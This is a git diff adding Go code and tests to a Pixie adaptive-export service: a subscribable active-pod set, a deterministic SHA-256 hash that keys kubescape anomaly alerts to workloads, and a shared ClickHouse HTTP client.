+// `version` is advanced ONLY on membership changes (new pod added).
+// A pure t_end extension does NOT bump version — subscribers use
+// version skips as their "membership might have changed" signal, and
+// spurious bumps force unnecessary re-snapshots.
+func (s *ActiveSet) Upsert(k Key, tEnd time.Time) {
+ s.mu.Lock()
+ prev, existed := s.members[k]
+ if existed && !tEnd.After(prev) {
+ s.mu.Unlock()
+ return // no-op extension; quietly skip
+ }
+ s.members[k] = tEnd
+ if existed {
+ // Pure t_end extension: store new value, no version bump,
+ // no delta. Subscribers see no membership change.
+ s.mu.Unlock()
+ return
+ }
+ s.version++
+ v := s.version
+ s.mu.Unlock()
+ s.broadcast(Delta{Added: []Key{k}, Version: v})
+}
+
+// Remove drops a pod. No-op if not present. Always emits a delta on
+// real removals so subscribers can shrink allowlists.
+func (s *ActiveSet) Remove(k Key) {
+ s.mu.Lock()
+ if _, ok := s.members[k]; !ok {
+ s.mu.Unlock()
+ return
+ }
+ delete(s.members, k)
+ s.version++
+ v := s.version
+ s.mu.Unlock()
+ s.broadcast(Delta{Removed: []Key{k}, Version: v})
+}
+
+// PruneExpired removes every pod whose t_end is at or before `at`.
+// Returns the removed keys for caller-side logging. Emits ONE delta
+// containing all removals so subscribers re-evaluate once.
+func (s *ActiveSet) PruneExpired(at time.Time) []Key {
+ s.mu.Lock()
+ var removed []Key
+ for k, tEnd := range s.members {
+ if !tEnd.After(at) {
+ removed = append(removed, k)
+ delete(s.members, k)
+ }
+ }
+ if len(removed) == 0 {
+ s.mu.Unlock()
+ return nil
+ }
+ s.version++
+ v := s.version
+ s.mu.Unlock()
+ s.broadcast(Delta{Removed: removed, Version: v})
+ return removed
+}
+
+// Snapshot returns the current set + version atomically. Caller owns
+// the returned slice — safe to mutate. Use this on subscription to
+// build the initial allowlist before listening for deltas.
+func (s *ActiveSet) Snapshot() ([]Key, uint64) {
+ s.mu.Lock()
+ defer s.mu.Unlock()
+ out := make([]Key, 0, len(s.members))
+ for k := range s.members {
+ out = append(out, k)
+ }
+ return out, s.version
+}
+
+// Size returns the current membership count (test + metric helper).
+func (s *ActiveSet) Size() int {
+ s.mu.Lock()
+ defer s.mu.Unlock()
+ return len(s.members)
+}
+
+// Subscribe returns a channel of deltas. Buffer size sets the
+// tolerance for slow consumers; the channel drops oldest deltas on
+// overflow and subscribers MUST re-snapshot if they detect a version
+// gap. Channel is closed when ctx-equivalent shutdown is signalled
+// via Unsubscribe.
+//
+// Race hazard: a caller that does `Snapshot()` then `Subscribe()`
+// can miss any membership change that lands between the two calls.
+// Prefer `SubscribeAndSnapshot()` which is atomic.
+func (s *ActiveSet) Subscribe(buffer int) <-chan Delta {
+ if buffer < 1 {
+ buffer = 1
+ }
+ ch := make(chan Delta, buffer)
+ s.subsMu.Lock()
+ s.subs = append(s.subs, ch)
+ s.subsMu.Unlock()
+ return ch
+}
+
+// SubscribeAndSnapshot atomically captures the current membership
+// AND registers the subscription, so the consumer is guaranteed to
+// see EVERY change that lands at or after the returned version
+// without losing changes in the race window between the two.
+//
+// Returned tuple:
+//
+// keys — current membership at snapshot time
+// deltas — channel that will receive every future delta
+// version — the version of `keys`; consumers can filter the
+// channel by `delta.Version > version`
+//
+// This is the recommended consumer API for bootstrapping.
+func (s *ActiveSet) SubscribeAndSnapshot(buffer int) ([]Key, <-chan Delta, uint64) {
+ if buffer < 1 {
+ buffer = 1
+ }
+ ch := make(chan Delta, buffer)
+ // Hold BOTH mutexes for the duration of {snapshot, register}.
+ // Order: s.mu first (membership), then s.subsMu (subscriber list).
+ // broadcast() takes only s.subsMu, so there's no ordering risk.
+ s.mu.Lock()
+ keys := make([]Key, 0, len(s.members))
+ for k := range s.members {
+ keys = append(keys, k)
+ }
+ version := s.version
+ s.subsMu.Lock()
+ s.subs = append(s.subs, ch)
+ s.subsMu.Unlock()
+ s.mu.Unlock()
+ return keys, ch, version
+}
+
+// Unsubscribe removes and closes a previously-returned channel.
+// Idempotent (no error on unknown chan).
+func (s *ActiveSet) Unsubscribe(ch <-chan Delta) {
+ s.subsMu.Lock()
+ defer s.subsMu.Unlock()
+ for i, c := range s.subs {
+ // compare on the directional alias — Go permits this implicit conversion
+ if (<-chan Delta)(c) == ch {
+ s.subs = append(s.subs[:i], s.subs[i+1:]...)
+ close(c)
+ return
+ }
+ }
+}
+
+// broadcast attempts to send to every subscriber non-blockingly. On
+// buffer overflow the OLDEST delta is dropped so the most recent
+// state-change always reaches the subscriber (it'll re-snapshot if
+// the version gap matters). This is the contract: subscribers MUST
+// tolerate dropped deltas + use Snapshot to reconcile.
+func (s *ActiveSet) broadcast(d Delta) {
+ s.subsMu.Lock()
+ defer s.subsMu.Unlock()
+ for _, c := range s.subs {
+ select {
+ case c <- d:
+ default:
+ // Drop oldest by draining one then sending.
+ select {
+ case <-c:
+ default:
+ }
+ select {
+ case c <- d:
+ default:
+ }
+ }
+ }
+}
diff --git a/src/vizier/services/adaptive_export/internal/activeset/activeset_test.go b/src/vizier/services/adaptive_export/internal/activeset/activeset_test.go
new file mode 100644
index 00000000000..47ff9ad7c78
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/activeset/activeset_test.go
@@ -0,0 +1,225 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package activeset
+
+import (
+ "sync"
+ "testing"
+ "time"
+)
+
+func TestUpsertEmitsAddedDelta(t *testing.T) {
+ s := New()
+ ch := s.Subscribe(4)
+ s.Upsert(Key{Namespace: "ns", Pod: "p1"}, time.Now().Add(5*time.Minute))
+ select {
+ case d := <-ch:
+ if len(d.Added) != 1 || d.Added[0].Pod != "p1" {
+ t.Fatalf("expected added=[p1], got %+v", d)
+ }
+ case <-time.After(200 * time.Millisecond):
+ t.Fatalf("no delta")
+ }
+}
+
+func TestUpsertExtendDoesNotEmitDelta(t *testing.T) {
+ s := New()
+ ch := s.Subscribe(4)
+ k := Key{Namespace: "ns", Pod: "p1"}
+ t0 := time.Now()
+ s.Upsert(k, t0.Add(1*time.Minute))
+ <-ch // drain initial add
+ s.Upsert(k, t0.Add(5*time.Minute))
+ select {
+ case d := <-ch:
+ t.Fatalf("unexpected delta on pure extension: %+v", d)
+ case <-time.After(100 * time.Millisecond):
+ // good
+ }
+}
+
+func TestRemoveEmitsRemovedDelta(t *testing.T) {
+ s := New()
+ ch := s.Subscribe(4)
+ k := Key{Namespace: "ns", Pod: "p1"}
+ s.Upsert(k, time.Now().Add(1*time.Minute))
+ <-ch
+ s.Remove(k)
+ select {
+ case d := <-ch:
+ if len(d.Removed) != 1 || d.Removed[0].Pod != "p1" {
+ t.Fatalf("expected removed=[p1], got %+v", d)
+ }
+ case <-time.After(200 * time.Millisecond):
+ t.Fatalf("no delta")
+ }
+}
+
+func TestPruneExpiredBatchesRemovals(t *testing.T) {
+ s := New()
+ ch := s.Subscribe(4)
+ now := time.Now()
+ s.Upsert(Key{Pod: "a"}, now.Add(-time.Minute)) // already expired
+ s.Upsert(Key{Pod: "b"}, now.Add(time.Minute)) // still active
+ s.Upsert(Key{Pod: "c"}, now.Add(-time.Second)) // already expired
+ // drain the three add deltas
+ for i := 0; i < 3; i++ {
+ <-ch
+ }
+ removed := s.PruneExpired(now)
+ if len(removed) != 2 {
+ t.Fatalf("expected 2 removals, got %d (%v)", len(removed), removed)
+ }
+ select {
+ case d := <-ch:
+ if len(d.Removed) != 2 {
+ t.Fatalf("expected single delta with 2 removals, got %+v", d)
+ }
+ case <-time.After(200 * time.Millisecond):
+ t.Fatalf("no delta from PruneExpired")
+ }
+}
+
+func TestUpsertExtendDoesNotAdvanceVersion(t *testing.T) {
+ // Per CR feedback (activeset.go:110): pure extension shouldn't
+ // bump version, because the version is the consumer's "did
+ // membership change?" signal. Spurious bumps make subscribers
+ // re-snapshot for nothing.
+ s := New()
+ k := Key{Pod: "p"}
+ s.Upsert(k, time.Now().Add(time.Minute))
+ _, v1 := s.Snapshot()
+ // Extend the SAME pod's t_end repeatedly.
+ for i := 0; i < 10; i++ {
+ s.Upsert(k, time.Now().Add(time.Duration(i+2)*time.Minute))
+ }
+ _, v2 := s.Snapshot()
+ if v2 != v1 {
+ t.Fatalf("version advanced on pure extension: v1=%d v2=%d", v1, v2)
+ }
+ // But a new pod DOES advance.
+ s.Upsert(Key{Pod: "q"}, time.Now().Add(time.Minute))
+ _, v3 := s.Snapshot()
+ if v3 == v2 {
+ t.Fatalf("version did NOT advance on new pod add: v=%d", v3)
+ }
+}
+
+func TestSnapshotReturnsCurrentMembers(t *testing.T) {
+ s := New()
+ s.Upsert(Key{Namespace: "n1", Pod: "p1"}, time.Now().Add(time.Minute))
+ s.Upsert(Key{Namespace: "n2", Pod: "p2"}, time.Now().Add(time.Minute))
+ keys, v := s.Snapshot()
+ if len(keys) != 2 {
+ t.Fatalf("expected 2 keys, got %d", len(keys))
+ }
+ if v == 0 {
+ t.Fatalf("version should have advanced")
+ }
+}
+
+func TestSubscriberOverflowDropsOldest(t *testing.T) {
+ s := New()
+ ch := s.Subscribe(2) // tiny buffer
+ for i := 0; i < 10; i++ {
+ s.Upsert(Key{Pod: string(rune('a' + i))}, time.Now().Add(time.Minute))
+ }
+ // We expect at most buffer-size deltas to survive — the rest were dropped.
+ collected := 0
+ for {
+ select {
+ case <-ch:
+ collected++
+ case <-time.After(50 * time.Millisecond):
+ if collected == 0 {
+ t.Fatalf("got zero deltas; broadcast is broken")
+ }
+ if collected > 2 {
+ t.Fatalf("got %d deltas from a 2-buffer channel; drop-oldest broken", collected)
+ }
+ return
+ }
+ }
+}
+
+// TestSubscribeAndSnapshot_RaceFreeBootstrap — per CR (activeset.go:183):
+// a consumer that wants both "initial state" + "all future deltas"
+// must be able to do so without missing changes between Snapshot()
+// and Subscribe(). Verify the combined helper.
+func TestSubscribeAndSnapshot_RaceFreeBootstrap(t *testing.T) {
+ s := New()
+ s.Upsert(Key{Pod: "preexisting"}, time.Now().Add(time.Minute))
+
+ // Simulate a hostile interleaving: between when we'd call Snapshot
+ // and when we'd call Subscribe, a concurrent Upsert lands.
+ // Without a combined helper, we'd miss it. The combined helper
+ // must report the new pod EITHER in the initial set OR in the
+ // first delta — never lost.
+ keys, ch, version := s.SubscribeAndSnapshot(4)
+ // Concurrent upsert AFTER subscription.
+ go func() {
+ s.Upsert(Key{Pod: "racy"}, time.Now().Add(time.Minute))
+ }()
+
+ if len(keys) != 1 || keys[0].Pod != "preexisting" {
+ t.Fatalf("initial snapshot wrong: %+v", keys)
+ }
+ // Drain delta.
+ select {
+ case d := <-ch:
+ if d.Version <= version {
+ t.Fatalf("delta version %d <= snapshot version %d", d.Version, version)
+ }
+ seen := false
+ for _, k := range d.Added {
+ if k.Pod == "racy" {
+ seen = true
+ }
+ }
+ if !seen {
+ t.Fatalf("racy pod not in delta added=%v", d.Added)
+ }
+ case <-time.After(500 * time.Millisecond):
+ t.Fatalf("no delta within 500ms")
+ }
+}
+
+func TestConcurrentUpsertsAreSafe(t *testing.T) {
+ s := New()
+ var wg sync.WaitGroup
+ for i := 0; i < 50; i++ {
+ i := i
+ wg.Add(1)
+ go func() {
+ defer wg.Done()
+ s.Upsert(Key{Pod: string(rune('a' + (i % 26)))}, time.Now().Add(time.Minute))
+ }()
+ }
+ wg.Wait()
+ if s.Size() == 0 {
+ t.Fatalf("size 0 after 50 concurrent upserts")
+ }
+}
+
+func TestRenderKey(t *testing.T) {
+ if got := (Key{Namespace: "n", Pod: "p"}).Render(); got != "n/p" {
+ t.Fatalf("render = %q, want n/p", got)
+ }
+ if got := (Key{Pod: "p"}).Render(); got != "p" {
+ t.Fatalf("render(no ns) = %q, want p", got)
+ }
+}
diff --git a/src/vizier/services/adaptive_export/internal/anomaly/BUILD.bazel b/src/vizier/services/adaptive_export/internal/anomaly/BUILD.bazel
new file mode 100644
index 00000000000..8f0d97ac68c
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/anomaly/BUILD.bazel
@@ -0,0 +1,34 @@
+# Copyright 2018- The Pixie Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# SPDX-License-Identifier: Apache-2.0
+
+load("@io_bazel_rules_go//go:def.bzl", "go_library")
+load("//bazel:pl_build_system.bzl", "pl_go_test")
+
+go_library(
+ name = "anomaly",
+ srcs = ["hash.go"],
+ importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly",
+ visibility = ["//src/vizier/services/adaptive_export:__subpackages__"],
+)
+
+pl_go_test(
+ name = "anomaly_test",
+ srcs = [
+ "hash_bench_test.go",
+ "hash_test.go",
+ ],
+ embed = [":anomaly"],
+)
diff --git a/src/vizier/services/adaptive_export/internal/anomaly/hash.go b/src/vizier/services/adaptive_export/internal/anomaly/hash.go
new file mode 100644
index 00000000000..0a0bbaac613
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/anomaly/hash.go
@@ -0,0 +1,86 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+// Package anomaly defines the source-agnostic identity of one anomaly
+// observation: a four-field Target and the deterministic AnomalyHash
+// derived from it.
+//
+// AnomalyHash is the join key written by the operator into
+// forensic_db.adaptive_attribution and joined against pixie observation
+// tables on (hostname, namespace, pod, time_).
+//
+// The hash is workload-identity, NOT event-identity: it carries no
+// timestamp and no rule id. The same workload firing N anomalies
+// produces N kubescape rows, all collapsing to the same hash. This
+// makes the hash a meaningful partition / join key.
+package anomaly
+
+import (
+ "crypto/sha256"
+ "encoding/binary"
+ "encoding/hex"
+)
+
+// AnomalyHash is the 32-hex-character (16-byte) join key derived from
+// a Target. Same Target → same AnomalyHash, every time.
+type AnomalyHash string
+
+// Target is the workload-identity used for hashing. Pod and Namespace
+// MAY be empty (host-pid processes outside any pod). PID + Comm are
+// always required by the producer; the hash function does not enforce
+// that — extraction is the place to enforce.
+//
+// Note: timestamp and rule id deliberately not in the hash. Different
+// rule firings on the same workload share the same hash; the time
+// dimension is carried separately in the attribution row's
+// (t_start, t_end) interval.
+type Target struct {
+ PID uint64
+ Comm string
+ Pod string // may be empty
+ Namespace string // may be empty
+}
+
+// Hash returns the deterministic 32-hex-character AnomalyHash for the
+// given Target. SHA-256 over a length-prefixed canonical encoding of
+// the four identity fields, truncated to the leading 16 bytes
+// (32 hex chars). 128 collision bits suffice for the workload
+// cardinality envelope.
+//
+// The encoding is: PID as big-endian uint64, followed by each string
+// as uint32-LE length || bytes. Length prefixing is collision-safe
+// across delimiter-bearing or empty inputs (a plain ":"-join is not —
+// e.g. {Pod:"a:b", NS:""} would collide with {Pod:"a", NS:"b:"}).
+func Hash(t Target) AnomalyHash {
+ h := sha256.New()
+ var pidBuf [8]byte
+ binary.BigEndian.PutUint64(pidBuf[:], t.PID)
+ h.Write(pidBuf[:])
+ writeLenPrefixed(h, t.Comm)
+ writeLenPrefixed(h, t.Pod)
+ writeLenPrefixed(h, t.Namespace)
+ sum := h.Sum(nil)
+ return AnomalyHash(hex.EncodeToString(sum[:16]))
+}
+
+// writeLenPrefixed writes uint32-LE length followed by the raw bytes.
+// 4 GiB per field is well above any realistic Pod/Namespace/Comm size.
+func writeLenPrefixed(h interface{ Write([]byte) (int, error) }, s string) {
+ var lenBuf [4]byte
+ binary.LittleEndian.PutUint32(lenBuf[:], uint32(len(s)))
+ _, _ = h.Write(lenBuf[:])
+ _, _ = h.Write([]byte(s))
+}
diff --git a/src/vizier/services/adaptive_export/internal/anomaly/hash_bench_test.go b/src/vizier/services/adaptive_export/internal/anomaly/hash_bench_test.go
new file mode 100644
index 00000000000..74d0e8d0b75
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/anomaly/hash_bench_test.go
@@ -0,0 +1,119 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package anomaly
+
+import (
+ "fmt"
+ "sync/atomic"
+ "testing"
+)
+
+// anomaly.Hash sits on the HOTTEST path in AE: it runs for every
+// kubescape event the trigger fans into the controller. At ~1k
+// events/sec on a busy cluster, that's 1k Hash() calls/sec PLUS the
+// kubescape extraction allocations on each upstream Row.
+//
+// These benchmarks establish the per-call cost. The fields are sized
+// to match real workloads: Pod is the standard 51-char k8s name,
+// Namespace ~20 chars, Comm 16 chars (max kernel limit).
+
+func benchTarget(i int) Target {
+ return Target{
+ PID: uint64(1000 + i),
+ Comm: "java",
+ Pod: "backend-vulnerable-779cd9d765-mxr8t-replica-shard-9",
+ Namespace: "log4j-poc-production",
+ }
+}
+
+func BenchmarkHash(b *testing.B) {
+ t := benchTarget(0)
+ b.ReportAllocs()
+ b.ResetTimer()
+ for i := 0; i < b.N; i++ {
+ _ = Hash(t)
+ }
+}
+
+// BenchmarkHash_Unique varies the PID each iteration. Establishes
+// what the hash costs when the inputs aren't shared across calls (so
+// no CPU caching shortcut on the input bytes).
+func BenchmarkHash_Unique(b *testing.B) {
+ b.ReportAllocs()
+ b.ResetTimer()
+ for i := 0; i < b.N; i++ {
+ _ = Hash(benchTarget(i))
+ }
+}
+
+// BenchmarkHash_LongNamespace pumps the fields to their realistic
+// upper bound (256-char Pod, 63-char namespace per k8s DNS limits).
+// Shows whether the SHA-256 step or the writeLenPrefixed allocations
+// dominate.
+func BenchmarkHash_LongFields(b *testing.B) {
+ t := Target{
+ PID: 12345,
+ Comm: "very-long-process-name-near-kernel-limit-16chrs!",
+ Pod: "extremely-long-statefulset-pod-name-with-replica-suffix-and-shard-suffix-pushing-the-k8s-253-char-dns-limit-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
+ Namespace: "production-tenant-namespace-63-chars-aaaaaaaaaaaaaaaaaaaaaaaaa",
+ }
+ b.ReportAllocs()
+ b.ResetTimer()
+ for i := 0; i < b.N; i++ {
+ _ = Hash(t)
+ }
+}
+
+// BenchmarkHash_Parallel measures contention under GOMAXPROCS
+// goroutines computing hashes in parallel. AE on a busy cluster has
+// 11 BatchWriter + 11 TableScanner streaming goroutines plus the
+// controller fan-out; if Hash's sha256.New() or its hex.EncodeToString
+// hit a shared allocator pool, parallel speedup will collapse.
+func BenchmarkHash_Parallel(b *testing.B) {
+ b.ReportAllocs()
+ b.ResetTimer()
+ var i atomic.Uint64
+ b.RunParallel(func(pb *testing.PB) {
+ for pb.Next() {
+ _ = Hash(benchTarget(int(i.Add(1))))
+ }
+ })
+}
+
+// BenchmarkHash_KubescapeReplay simulates the trigger-controller
+// fan-out: drain a batch of 10k events (the configured PollLimit
+// default) by hashing each one's target. Measures the per-batch
+// hash cost — call once per trigger poll on a busy cluster.
+func BenchmarkHash_KubescapeReplay(b *testing.B) {
+ const batch = 10_000
+ targets := make([]Target, batch)
+ for i := range targets {
+ targets[i] = Target{
+ PID: uint64(1000 + i),
+ Comm: fmt.Sprintf("proc-%d", i%64),
+ Pod: fmt.Sprintf("backend-%d-7bdf99c466-replica-%d", i%32, i%4),
+ Namespace: fmt.Sprintf("ns-%d", i%8),
+ }
+ }
+ b.ResetTimer()
+ b.ReportAllocs()
+ for n := 0; n < b.N; n++ {
+ for j := range targets {
+ _ = Hash(targets[j])
+ }
+ }
+}
diff --git a/src/vizier/services/adaptive_export/internal/anomaly/hash_test.go b/src/vizier/services/adaptive_export/internal/anomaly/hash_test.go
new file mode 100644
index 00000000000..360f3422928
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/anomaly/hash_test.go
@@ -0,0 +1,140 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package anomaly
+
+import (
+ "reflect"
+ "testing"
+)
+
+// canonical fixture: redis CVE-2025-49844 R1005 alert (workload identity only).
+var canonicalTarget = Target{
+ PID: 106040,
+ Comm: "redis-server",
+ Pod: "redis-578d5dc9bd-kjj78",
+ Namespace: "redis",
+}
+
+// TestHash_Deterministic — same Target hashes identically every call.
+func TestHash_Deterministic(t *testing.T) {
+ a := Hash(canonicalTarget)
+ b := Hash(canonicalTarget)
+ if a != b {
+ t.Fatalf("not deterministic: %q vs %q", a, b)
+ }
+ if got := len(a); got != 32 {
+ t.Fatalf("len %d, want 32 hex chars", got)
+ }
+}
+
+// TestHash_DiffersOnPID — two processes on the same pod still hash differently
+// (we want PER-process attribution).
+func TestHash_DiffersOnPID(t *testing.T) {
+ other := canonicalTarget
+ other.PID = canonicalTarget.PID + 1
+ if Hash(canonicalTarget) == Hash(other) {
+ t.Fatalf("collision on PID change")
+ }
+}
+
+// TestHash_DiffersOnComm — different comm under same PID/pod/ns must differ.
+func TestHash_DiffersOnComm(t *testing.T) {
+ other := canonicalTarget
+ other.Comm = "redis-cli"
+ if Hash(canonicalTarget) == Hash(other) {
+ t.Fatalf("collision on Comm change")
+ }
+}
+
+// TestHash_DiffersOnPod — different replicas of same workload differ.
+func TestHash_DiffersOnPod(t *testing.T) {
+ other := canonicalTarget
+ other.Pod = "redis-578d5dc9bd-OTHER"
+ if Hash(canonicalTarget) == Hash(other) {
+ t.Fatalf("collision on Pod change")
+ }
+}
+
+// TestHash_DiffersOnNamespace — same pod name in different ns must differ.
+func TestHash_DiffersOnNamespace(t *testing.T) {
+ other := canonicalTarget
+ other.Namespace = "redis-staging"
+ if Hash(canonicalTarget) == Hash(other) {
+ t.Fatalf("collision on Namespace change")
+ }
+}
+
+// TestHash_AllowsEmptyPod — host-pid processes have no pod/namespace.
+// Hash must still be computable and stable.
+func TestHash_AllowsEmptyPod(t *testing.T) {
+ host := Target{PID: 1, Comm: "systemd"}
+ a := Hash(host)
+ b := Hash(host)
+ if a != b {
+ t.Fatalf("empty-pod hash not deterministic")
+ }
+ if len(a) != 32 {
+ t.Fatalf("empty-pod hash len %d", len(a))
+ }
+ // empty-pod target must collide with itself but not with the
+ // non-empty-pod canonical target.
+ if a == Hash(canonicalTarget) {
+ t.Fatalf("empty-pod hash collides with named-pod hash")
+ }
+}
+
+// TestHash_NoTimestampInfluence — verifies the hash function takes only
+// the four identity fields. (No EventTime / RuleID parameter exists.)
+// This is a structural test: the Target struct has exactly 4 fields,
+// all part of the canonical form. If you add a field, you must decide
+// whether it belongs in the hash and update this test.
+func TestHash_NoTimestampInfluence(t *testing.T) {
+ // Pin the shape so adding a new field (even at zero value) makes
+ // this test fail loudly. CR feedback: an equality-of-two-equal-
+ // constructions check would pass even when a new field is added,
+ // so we also assert the type's field count.
+ const wantFields = 4
+ if got := reflect.TypeOf(Target{}).NumField(); got != wantFields {
+ t.Fatalf("Target field count = %d, want %d; decide whether the new "+
+ "field belongs in the canonical hash form (update Hash + this guard)",
+ got, wantFields)
+ }
+ a := Target{PID: 1, Comm: "x", Pod: "p", Namespace: "n"}
+ if Hash(a) != Hash(Target{PID: 1, Comm: "x", Pod: "p", Namespace: "n"}) {
+ t.Fatalf("Target hash leaks an unrecognised field")
+ }
+}
+
+// TestHash_NoDelimiterCollision — naive ":"-joined canonical forms
+// collide when input values can contain ":" or be empty. The fix is a
+// length-prefixed (or otherwise delimiter-safe) encoding before hashing.
+// Without that fix, the two Targets below produce the same canonical
+// string and therefore the same hash.
+func TestHash_NoDelimiterCollision(t *testing.T) {
+ a := Target{PID: 0, Comm: "", Pod: "a:b", Namespace: ""}
+ b := Target{PID: 0, Comm: "", Pod: "a", Namespace: "b:"}
+ if Hash(a) == Hash(b) {
+ t.Fatalf("delimiter collision: %+v and %+v hash to the same value (%s)",
+ a, b, Hash(a))
+ }
+ c := Target{PID: 0, Comm: "x:y", Pod: "", Namespace: ""}
+ d := Target{PID: 0, Comm: "x", Pod: "y:", Namespace: ""}
+ if Hash(c) == Hash(d) {
+ t.Fatalf("delimiter collision: %+v and %+v hash to the same value (%s)",
+ c, d, Hash(c))
+ }
+}
diff --git a/src/vizier/services/adaptive_export/internal/chhttp/BUILD.bazel b/src/vizier/services/adaptive_export/internal/chhttp/BUILD.bazel
new file mode 100644
index 00000000000..a52c1c89c32
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/chhttp/BUILD.bazel
@@ -0,0 +1,31 @@
+# Copyright 2018- The Pixie Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# SPDX-License-Identifier: Apache-2.0
+
+load("@io_bazel_rules_go//go:def.bzl", "go_library")
+load("//bazel:pl_build_system.bzl", "pl_go_test")
+
+go_library(
+ name = "chhttp",
+ srcs = ["chhttp.go"],
+ importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/chhttp",
+ visibility = ["//src/vizier/services/adaptive_export:__subpackages__"],
+)
+
+pl_go_test(
+ name = "chhttp_test",
+ srcs = ["chhttp_test.go"],
+ embed = [":chhttp"],
+)
diff --git a/src/vizier/services/adaptive_export/internal/chhttp/chhttp.go b/src/vizier/services/adaptive_export/internal/chhttp/chhttp.go
new file mode 100644
index 00000000000..d96b784c7e7
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/chhttp/chhttp.go
@@ -0,0 +1,232 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+// Package chhttp is the one HTTP client every AE-internal package uses to
+// talk to ClickHouse's HTTP interface (port 8123 by default). Previously
+// the same client was reimplemented three times (clickhouse.Applier,
+// sink.ClickHouseHTTP, trigger.ClickHouseWatermarkStore) with subtly
+// different endpoint validation, timeout defaults and error-extraction
+// logic; this package collapses that to a single implementation.
+package chhttp
+
+import (
+ "bytes"
+ "context"
+ "fmt"
+ "io"
+ "net/http"
+ "net/url"
+ "strings"
+ "time"
+)
+
+// DefaultTimeout is applied when New is called with timeout==0. Matches
+// the budget the original three clients each chose independently.
+const DefaultTimeout = 30 * time.Second
+
+// Client is a minimal HTTP CH client. Safe for concurrent use.
+type Client struct {
+ endpoint string
+ user string
+ pass string
+ hc *http.Client
+}
+
+// New validates the endpoint and returns a ready client. timeout<=0 →
+// DefaultTimeout. endpoint must be an absolute http(s) URL with no query
+// string or fragment (we append ?query=… ourselves); trailing slashes
+// are stripped so concatenations don't produce //.
+func New(endpoint, user, pass string, timeout time.Duration) (*Client, error) {
+ if endpoint == "" {
+ return nil, fmt.Errorf("chhttp: empty endpoint")
+ }
+ u, err := url.Parse(endpoint)
+ if err != nil {
+ return nil, fmt.Errorf("chhttp: invalid endpoint %q: %w", endpoint, err)
+ }
+ if (u.Scheme != "http" && u.Scheme != "https") || u.Host == "" {
+ return nil, fmt.Errorf("chhttp: endpoint must be an absolute http(s) URL: %q", endpoint)
+ }
+ if u.RawQuery != "" || u.Fragment != "" {
+ return nil, fmt.Errorf("chhttp: endpoint must not include query parameters or a fragment: %q", endpoint)
+ }
+ if timeout <= 0 {
+ timeout = DefaultTimeout
+ }
+ return &Client{
+ endpoint: strings.TrimRight(endpoint, "/"),
+ user: user,
+ pass: pass,
+ hc: &http.Client{Timeout: timeout},
+ }, nil
+}
